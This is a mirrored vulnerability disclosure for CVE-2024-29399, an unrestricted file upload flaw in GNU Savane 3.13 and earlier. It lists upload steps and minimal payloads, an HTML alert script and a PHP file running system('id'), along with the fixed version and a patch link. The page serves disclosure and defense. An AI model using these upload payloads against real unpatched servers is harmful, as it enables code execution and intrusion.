CVE-2024-29399 PoC — GNU Savane 安全漏洞

Source

https://github.com/ally-petitt/CVE-2024-29399

Associated Vulnerability

Title:GNU Savane 安全漏洞 (CVE-2024-29399)
Description:GNU Savane是美国GNU社区的一套合作软件发展管理系统。 GNU Savane v.3.13及之前版本存在安全漏洞，该漏洞源于允许远程攻击者执行任意代码并通过精心设计的文件升级权限。

Description

CVE-2024-29399 reference

Readme

# CVE-2024-29399 Vulnerability Details

## Overview

In Savane v3.13 and prior, a lack of validation on uploaded files can allow for privilege escalation. Web servers configured according to the installation instructions are vulnerable to Cross-Site Scripting (XSS). In misconfigured web servers this can lead to Remote Code Execution (RCE).

**CWE Classification:** CWE-434: Unrestricted Upload of File with Dangerous Type

**Reported By:** Ally Petitt 

**Affected Product**: Savane

**Affected Versions**: 3.13 and prior

## Validation Steps
1. Visit /register/upload.php in the browser.
2. Upload a malicious file. This can be, but is not limited to, an HTML or PHP file depending on the webserver configuration (see Overview). Examples of either are shown below:

**PoC.html**
```
<script>
  alert("XSS");
</script>
```

**PoC.php**
```
<?php
  echo system("id");
?>
```


4. Visit the displayed link to the uploaded file to trigger code execution.


## Mitigation

Upgrade to Savane version 3.14 or higher. The patch can be found [here](https://git.savannah.nongnu.org/cgit/administration/savane.git/commit/?h=i18n&id=8a91ee8aae2599931d8b1c9a97ae4922b0c95c85).

File Snapshot


 [4.0K]  /data/pocs/89c82a48f8f1cdc0c44942ae8397f684e0804129
└── [1.1K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!